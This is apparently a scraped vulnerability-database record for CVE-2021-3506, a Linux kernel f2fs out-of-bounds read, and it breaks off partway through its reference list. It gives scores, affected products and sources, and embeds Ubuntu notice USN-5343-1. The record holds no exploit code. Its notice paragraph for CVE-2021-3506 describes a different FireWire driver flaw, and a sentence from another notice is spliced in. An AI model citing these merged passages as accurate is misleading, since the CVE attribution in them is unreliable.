Ubuntu 16.04 ESM: linux-image-4.4.0-1103-kvm 4.4.0-1103.112 linux-image-4.4.0-1138-aws 4.4.0-1138.152 linux-image-4.4.0-222-generic 4.4.0-222.255 linux-image-4.4.0-222-lowlatency 4.4.0-222.255 linux-image-aws 4.4.0.1138.143 linux-image-generic 4.4.0.222.229 linux-image-kvm 4.4.0.1103.101 linux-image-lowlatency 4.4.0.222.229 linux-image-virtual 4.4.0.222.229
Ubuntu 14.04 ESM: linux-image-4.4.0-1102-aws 4.4.0-1102.107 linux-image-4.4.0-222-generic 4.4.0-222.255~14.04.1 linux-image-4.4.0-222-lowlatency 4.4.0-222.255~14.04.1 linux-image-aws 4.4.0.1102.100 linux-image-generic-lts-xenial 4.4.0.222.193 linux-image-lowlatency-lts-xenial 4.4.0.222.193 linux-image-virtual-lts-xenial 4.4.0.222.193
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-5343-1 CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449, CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555, CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129, CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688, CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033, CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483, CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612, CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204, CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008, CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485, CVE-2022-0492 . This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 0.8,
"vendor": "linux",
"version": "5.12.0-rc4"
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 0.8,
"vendor": "linux",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu",
"sources": [
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
}
],
"trust": 0.7
},
"cve": "CVE-2021-3506",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 5.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2021-3506",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 5.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-391284",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2021-3506",
"impactScore": 5.2,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-3506",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-3506",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-3506",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-1357",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-391284",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-3506",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"description": {
"_id": null,
"data": "An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. Linux Kernel Exists in an out-of-bounds read vulnerability.Information is obtained and service operation is interrupted (DoS) It may be in a state. The vulnerability stems from a boundary check failure. ==========================================================================\nUbuntu Security Notice USN-5343-1\nMarch 22, 2022\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty\n\nDetails:\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly restrict mount namespaces, when mounted with the non-default\nallow_userns option set. A local attacker could use this to gain\nadministrative privileges. (CVE-2016-2853)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly maintain POSIX ACL xattr data, when mounted with the non-default\nallow_userns option. A local attacker could possibly use this to gain\nelevated privileges. (CVE-2016-2854)\n\nIt was discovered that the f2fs file system in the Linux kernel did not\nproperly validate metadata in some situations. An attacker could use this\nto construct a malicious f2fs image that, when mounted and operated on,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-19449)\n\nIt was discovered that the XFS file system implementation in the Linux\nkernel did not properly validate meta data in some circumstances. An\nattacker could use this to construct a malicious XFS image that, when\nmounted, could cause a denial of service. (CVE-2020-12655)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly handle error conditions in some situations,\nleading to an infinite loop. A local attacker could use this to cause a\ndenial of service. (CVE-2020-25673)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. (CVE-2020-26147)\n\nIt was discovered that the BR/EDR pin-code pairing procedure in the Linux\nkernel was vulnerable to an impersonation attack. A physically proximate\nattacker could possibly use this to pair to a device without knowledge of\nthe pin-code. An authenticated attacker could possibly\nuse this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)\n\nIt was discovered that the FUSE user space file system implementation in\nthe Linux kernel did not properly handle bad inodes in some situations. A\nlocal attacker could possibly use this to cause a denial of service. \n(CVE-2020-36322)\n\nIt was discovered that the Infiniband RDMA userspace connection manager\nimplementation in the Linux kernel contained a race condition leading to a\nuse-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possible execute arbitrary code. \n(CVE-2020-36385)\n\nIt was discovered that the DRM subsystem in the Linux kernel contained\ndouble-free vulnerabilities. A privileged attacker could possibly use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-20292)\n\nIt was discovered that a race condition existed in the timer implementation\nin the Linux kernel. A privileged attacker could use this to cause a denial\nof service. (CVE-2021-20317)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). \n(CVE-2021-28688)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that a race condition existed in the netfilter subsystem\nof the Linux kernel when replacing tables. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that the CIPSO implementation in the Linux kernel did not\nproperly perform reference counting in some situations, leading to use-\nafter-free vulnerabilities. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33033)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nAsaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the\nLinux kernel did not properly validate large MTU requests from Virtual\nFunction (VF) devices. A local attacker could possibly use this to cause a\ndenial of service. (CVE-2021-33098)\n\nNorbert Slusarek discovered that the CAN broadcast manger (bcm) protocol\nimplementation in the Linux kernel did not properly initialize memory in\nsome situations. (CVE-2021-34693)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device initialization failure, leading to a double-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3564)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device detach events, leading to a use-after-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3573)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nIt was discovered that the Virtio console implementation in the Linux\nkernel did not properly validate input lengths in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2021-38160)\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly compute the access permissions for shadow pages in\nsome situations. A local attacker could use this to cause a denial of\nservice. (CVE-2021-38198)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the NFC implementation in the Linux kernel did not\nproperly handle failed connect events leading to a NULL pointer\ndereference. A local attacker could use this to cause a denial of service. \n(CVE-2021-38208)\n\nIt was discovered that the configfs interface for USB gadgets in the Linux\nkernel contained a race condition. (CVE-2021-39648)\n\nIt was discovered that the ext4 file system in the Linux kernel contained a\nrace condition when writing xattrs to an inode. A local attacker could use\nthis to cause a denial of service or possibly gain administrative\nprivileges. (CVE-2021-40490)\n\nIt was discovered that the 6pack network protocol driver in the Linux\nkernel did not properly perform validation checks. A privileged attacker\ncould use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2021-42008)\n\nIt was discovered that the ISDN CAPI implementation in the Linux kernel\ncontained a race condition in certain situations that could trigger an\narray out-of-bounds bug. A privileged local attacker could possibly use\nthis to cause a denial of service or execute arbitrary code. \n(CVE-2021-43389)\n\nIt was discovered that the Phone Network protocol (PhoNet) implementation\nin the Linux kernel did not properly perform reference counting in some\nerror conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45095)\n\nWenqing Liu discovered that the f2fs file system in the Linux kernel did\nnot properly validate the last xattr entry in an inode. An attacker could\nuse this to construct a malicious f2fs image that, when mounted and\noperated on, could cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-45469)\n\nAmit Klein discovered that the IPv6 implementation in the Linux kernel\ncould disclose internal state in some situations. An attacker could\npossibly use this to expose sensitive information. (CVE-2021-45485)\n\nIt was discovered that the per cpu memory allocator in the Linux kernel\ncould report kernel pointers via dmesg. An attacker could use this to\nexpose sensitive information or in conjunction with another kernel\nvulnerability. (CVE-2018-5995)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n linux-image-4.4.0-1103-kvm 4.4.0-1103.112\n linux-image-4.4.0-1138-aws 4.4.0-1138.152\n linux-image-4.4.0-222-generic 4.4.0-222.255\n linux-image-4.4.0-222-lowlatency 4.4.0-222.255\n linux-image-aws 4.4.0.1138.143\n linux-image-generic 4.4.0.222.229\n linux-image-kvm 4.4.0.1103.101\n linux-image-lowlatency 4.4.0.222.229\n linux-image-virtual 4.4.0.222.229\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1102-aws 4.4.0-1102.107\n linux-image-4.4.0-222-generic 4.4.0-222.255~14.04.1\n linux-image-4.4.0-222-lowlatency 4.4.0-222.255~14.04.1\n linux-image-aws 4.4.0.1102.100\n linux-image-generic-lts-xenial 4.4.0.222.193\n linux-image-lowlatency-lts-xenial 4.4.0.222.193\n linux-image-virtual-lts-xenial 4.4.0.222.193\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-5343-1\n CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449,\n CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672,\n CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555,\n CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129,\n CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688,\n CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033,\n CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483,\n CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612,\n CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204,\n CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008,\n CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485,\n CVE-2022-0492\n. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3506"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-3506",
"trust": 4.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/28/2",
"trust": 2.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/08/1",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "163291",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "163249",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166400",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166417",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-24-319-06",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96191615",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163597",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021051016",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032316",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2216",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1235",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2453",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2249",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163301",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "163253",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "163255",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-391284",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-3506",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"id": "VAR-202104-1670",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:30:32.569000Z",
"patch": {
"_id": null,
"data": [
{
"title": "[PATCH]\u00a0f2fs",
"trust": 0.8,
"url": "http://www.kernel.org"
},
{
"title": "Linux kernel Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=148827"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-3506 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-125",
"trust": 1.1
},
{
"problemtype": "Out-of-bounds read (CWE-125) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://www.openwall.com/lists/oss-security/2021/03/28/2"
},
{
"trust": 2.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/08/1"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
},
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944298"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210611-0007/"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
},
{
"trust": 1.0,
"url": "https://www.mail-archive.com/linux-kernel%40vger.kernel.org/msg2520013.html"
},
{
"trust": 0.8,
"url": "https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg2520013.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96191615/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-319-06"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1235"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166400/ubuntu-security-notice-usn-5339-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021051016"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166417/ubuntu-security-notice-usn-5343-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2453"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032316"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163597/ubuntu-security-notice-usn-5016-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-out-of-bounds-memory-reading-via-remove-nats-in-journal-35115"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5000-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-4997-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/125.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q2/107"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-3506"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-2853"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26555"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26558"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12655"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20292"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5995"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33098"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5343-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19449"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-2854"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1046.49"
},
{
"trust": 0.1,
